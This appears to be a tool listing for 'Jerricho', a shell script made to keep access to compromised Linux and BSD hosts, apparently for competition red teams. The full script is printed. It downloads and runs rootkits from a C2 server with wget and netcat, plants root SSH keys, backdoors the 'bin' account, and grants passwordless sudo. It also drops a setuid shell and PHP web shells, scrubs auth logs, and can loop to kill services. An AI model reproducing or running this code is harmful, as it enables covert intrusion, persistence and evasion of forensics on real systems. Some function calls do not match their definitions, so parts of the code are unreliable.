Jerricho is a simple bourne script that quickly drops several persistence mechanisms on a target Linux host. OS Support : Ubuntu, Centos, Debian, FreeBSD.
TODO:
– Add a web interface for managing the connections and running commands.
– Automatically pull down passwords from the local systems, store, and sort them accordingly.
– Add a function to check to see if the system is still infected / running the rootkit and backdoors and if not re-execute/re-infect the system.
– Aggregate sniffer logs
– Keeping track of hosts which are still accessible via rootkit
– add bin to sudoers
– clear up logs better (Could probably do a date check when we execute on the system and remove all log lines that are 5 seconds before and 15 seconds after)
– spider and revert sshd_config
– rootkit – specify multiple ports on cmdline
– add iptables -F to all init scripts.
– Change the timestamp of modified files
Usage :
+ You run it as root, it drops a bunch of backdoors in multiple places. This enabled us to easily retain access at regionals for almost all systems.
+ runs stuff out of “/dev/…” and “/dev/ ” (2 spaces) because hiding in plain sight is easy.
+ to run via msf session: sessions -c export HISTFILE=/dev/null; wget -q $C2_URL/scripts/jericho2.1.sh -O /dev/stdout | /bin/sh – && history -c
Must be change the URL :
C2 URL and c2 IPAddress
this creates several ways back in:
1) drops our kernel rootkit which hooks accept() — lets us back in via any listening port, hides processes, etc
2) adds a root ssh key
3) drops our modified trixd00rd (takes params from env vars) as ‘rsyslogd’
4) drops the rooty icmp backdoor as ‘udevd’
5) backdoors the ‘bin’ system account, adds it to sudoers
6) adds a setuid shell in “/dev/ /” for re-elevation from php/bin account if needed
7) drops a basic PHP shell in a couple of likely web roots (http://url/.src.php?e=uptime)
8) adds all likely webserver users to sudoers (www-data, apache, httpd)
Additional:
– removes all entries from who (removes & re-creates utmp file, we can be selective later)
– optionally installs root a crontab to clear iptables rules every 5m. (uncomment iptables stuff if needed)
– optionally runs a bash script that takes down all services every 10s (teams lose points, also currently disabled)
– adds a secondary pubkey location to sshd_config, sourcing keys from /etc/ssh/authorized_keys as well as the std %h/.ssh dirs.
– We actually had people unknowlingly remove the kernel backdoor through various upgrade and reboot activities, init script changes,etc, only for us to retain access using the web shell, re-elevate via the suid bin and reinstall.
Latest Released v-2.1 Code:
#!/bin/sh
# cmc / sapling
# installs rootkit & backdoors on debian/centos/pfsense bsd boxes
# root ssh key
SHARED_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKcAi3VkTNZOQsLiiPvE8gyThrLzD2w8g1aN4VArx8ksOfVteVRfDtjWVLgLpdbySjaIBXn4WeViqxf1TZ8fq5loN4tcHnFOvtBs30JQ1JktwXqwvZaHomqZGJeP0IHLK9rYsJZnHbyk4u2qgs/vpM3wkhX86ywpDzTo+xTEV+XPuCBP+e7QIDuBM20rXkHEroIssYDjSus9o3issH/u+iguGulJaW534mZ9YiC6ELoDKLpQ0wCgwEjLfg04Tz6L6mKBjkyq86wb5iDo0+5zrY5XKOJB5BiBsvAULBnA3to203ZaGrJWQP1CdPbpOINHkTekoWJt5W40LSD41pE86z"
### CHANGE ME ###
# urls for webserver where kits/backdoor binaries are hosted
# file names to grab
C2_URL="http://172.25.58.142/"
C2_IP="172.25.58.142"
# fedora kit
FEDORA_KIT="fedx32.bin"
FEDORA64_KIT="fedx64.bin"
UBUNTU64_KIT="ubux64.bin"
UBUNTU_KIT="ubux32.bin"
BSD_KIT="hole.bin"
TRIXDOOR="trixd00rd-static-ubuntu"
ROOTY="rooty-release.x86"
ROOTYBSD="rootybsd.x64"
#################
ARCH=`uname -i`
do_backdoors() {
echo "removing utmp.."
rm -rf /var/run/utmp
touch /var/run/utmp
chmod 664 /var/run/utmp
echo "installing root ssh key!"
chattr -i /root/.ssh/authorized*
if [ ! -d "/root/.ssh" ]; then
mkdir /root/.ssh
fi
echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys2
echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys
# add secondary key auth file, for when they inevitably remove /root/.ssh/
echo $SHARED_PUBKEY >> /etc/ssh/authorized_keys
echo 'AuthorizedKeysFile /etc/ssh/authorized_keys' >> /etc/ssh/sshd_config
chattr +i /root/.ssh/authorized_keys*
echo "dropping trixd00r.."
if [ ! -d "/dev/..." ]; then
mkdir /dev/...
fi
cd /dev/...
wget -q $C2_URL$TRIXDOOR -O rsyslogd
chmod +x rsyslogd
env PATH=$PWD MANAGER=$C2_IP /usr/bin/nohup rsyslogd &
echo "dropping rooty.."
wget -q $C2_URL$ROOTY -O udevd
chmod +x udevd
env PATH=$PWD /usr/bin/nohup udevd &
# uncomment below to do iptables crontab shenanigans
# echo "adding 5m disable iptables crontab.."
# echo "*/5 * * * * /sbin/iptables -F" | crontab -
echo "backdoor bin account! pass=lol123"
sed -i -e 's/bin:\*:/bin:$6$OkgT6DOT$0fswsID8AwsBF35QHXQVmDLzYGT.pUtizYw2G9ZCe.o5pPk6HfdDazwdqFIE40muVqJ832z.p.6dATUDytSdV0:/g' /etc/shadow
usermod -s /bin/sh bin
echo 'bin ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
echo 'www-data ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
echo 'apache ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
echo 'httpd ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
groupadd admin
# take care of logs, ie 'groupadd[31001]: new group: name=admin, GID=1005' in auth.log
sed -ie "/groupadd/d" /var/log/auth.log /var/log/messages /var/log/secure
# ubuntu automatically makes members of admin have sudo capabilities.
# lets give that as an option for root to web backdoors
usermod -G admin -a bin
usermod -G admin -a www-data
usermod -G admin -a httpd
usermod -G admin -a apache
# take care of logs, ie 'usermod[31005]: add 'bin' to group 'admin'
sed -ie "/usermod/d" /var/log/auth.log /var/log/messages /var/log/secure
echo "setuid /bin/sh! for use with bin account"
if [ ! -d "/dev/ " ]; then
mkdir "/dev/ "
fi
cp /bin/sh "/dev/ /pwnd"
chmod 777 "/dev/ /pwnd"
chown root:root "/dev/ /pwnd"
chmod u+s "/dev/ /pwnd"
echo "clearing log entries with our IP.."
sed -ie "/$C2_IP/d" /var/log/auth.log /var/log/messages /var/log/secure
sed -ie "/passwd/d" /var/log/auth.log /var/log/messages /var/log/secure
sed -ie "/Accepted password for bin/d" /var/log/auth.log /var/log/messages /var/log/secure
sed -ie "/Accepted password for root/d" /var/log/auth.log /var/log/messages /var/log/secure
echo "dropping webshells.."
echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
chmod 777 /var/www/.src.php
echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
chmod 777 /var/www/html/.src.php
}
do_bsdbackdoors() {
# this was a quick hack for the pfsense firewalls
# uses netcat vs wget because wget isnt installed on pfsense
# by default
echo "installing root ssh key!"
if [ ! -d "/root/.ssh" ]; then
mkdir /root/.ssh
fi
echo $PUBKEY >> /root/.ssh/authorized_keys2
echo $PUBKEY >> /root/.ssh/authorized_keys
chattr +i /root/.ssh/authorized_keys*
echo "dropping rooty via netcat.."
# NOTE: must have listening netcat with 'cat rootybsd.bin|nc -l 1338' on c2 server.
if [ ! -d "/dev/ " ]; then
mkdir "/dev/ "
fi
cd "/dev/ "
nc $C2_IP 1338 > udevd
chmod +x udevd
env PATH=$PWD /usr/bin/nohup udevd &
echo "dropping webshells.."
echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
chmod 777 /var/www/.src.php
echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
chmod 777 /var/www/html/.src.php
}
do_centos_rootkit() {
echo "Retrieving Fedora x86 kit..."
if [ ! -d "/dev/..." ]; then
mkdir /dev/...
fi
cd /dev/...
wget -q $C2_URL$FEDORA_KIT
chmod +x `basename $FEDORA_KIT`
./`basename $FEDORA_KIT`
}
do_centos64_rootkit() {
echo "Retrieving Fedora x64 kit..."
if [ ! -d "/dev/..." ]; then
mkdir /dev/...
fi
cd /dev/...
wget -q $C2_URL$FEDORA64_KIT
chmod +x `basename $FEDORA64_KIT`
./`basename $FEDORA64_KIT`
}
do_freebsd64_rootkit() {
echo "Installing BSD hole.bin.."
cd /opt/
# cmc: pfSense / BSD has no wget/curl
# make sure we have a listening netcat
# cat backdoor.bin | nc -v -l 13337
nc $C2_URL 1337 > /opt/scorebotd
# chmod 0755 `basename $BSD_KIT`
# mv `basename $BSD_KIT` /opt/scorebotd
chmod +x /opt/scorebotd
nohup /opt/scorebotd &
}
do_ubuntu_rootkit() {
echo "Retrieving ubuntu x86 kit..."
if [ ! -d "/dev/..." ]; then
mkdir /dev/...
fi
cd /dev/...
wget -q $C2_URL$UBUNTU_KIT
chmod +x `basename $UBUNTU_KIT`
./`basename $UBUNTU_KIT`
}
do_ubuntu64_rootkit() {
echo "Retrieving ubuntu x64 kit..."
if [ ! -d "/dev/..." ]; then
mkdir /dev/...
fi
cd /dev/...
wget -q $C2_URL$UBUNTU64_KIT
chmod +x `basename $UBUNTU64_KIT`
./`basename $UBUNTU64_KIT`
}
goodbye_sla() {
cat <<EOF > /usr/share/service.sh
#!/bin/bash
#UMAD?
while [ 0 ]
do
service httpd stop
service postfix stop
service sendmail stop
service mysql stop
service webmin stop
service named stop
service bind stop
killall -9 webmin.pl
killall -9 apache2
killall -9 httpd
killall -9 named
killall -9 mysqld_safe
killall -9 mysqld
sleep 10
done
EOF
chmod +x /usr/share/service.sh
nohup /usr/share/service.sh >/dev/null 2>&1 &
}
# 64bit fedora
if [ $ARCH = "x86_64" ] && [ -f "/etc/redhat-release" ]; then
do_centos64_rootkit
do_backdoors
fi
# 32bit fedora
if [ $ARCH != "x86_64" ] && [ -f "/etc/redhat-release" ]; then
do_centos_rootkit
do_backdoors
#goodbye_sla
fi
# ubuntu/debian 64bit
if [ $ARCH = "x86_64" ] && [ -f "/etc/debian_version" ]; then
do_ubuntu64_rootkit
do_backdoors
#goodbye_sla
fi
# ubuntu/debian 32bit (assumed if not 64, whatever)
if [ $ARCH != "x86_64" ] && [ -f "/etc/debian_version" ]; then
do_ubuntu32_rootkit
do_backdoors
#goodbye_sla
fi
# freebsd
if [ `uname` = 'FreeBSD' ]; then
do_freebsd64_kit
do_bsdbackdoors
fi
Download : Master.zip | Clone Url
Source : https://github.com/ketm768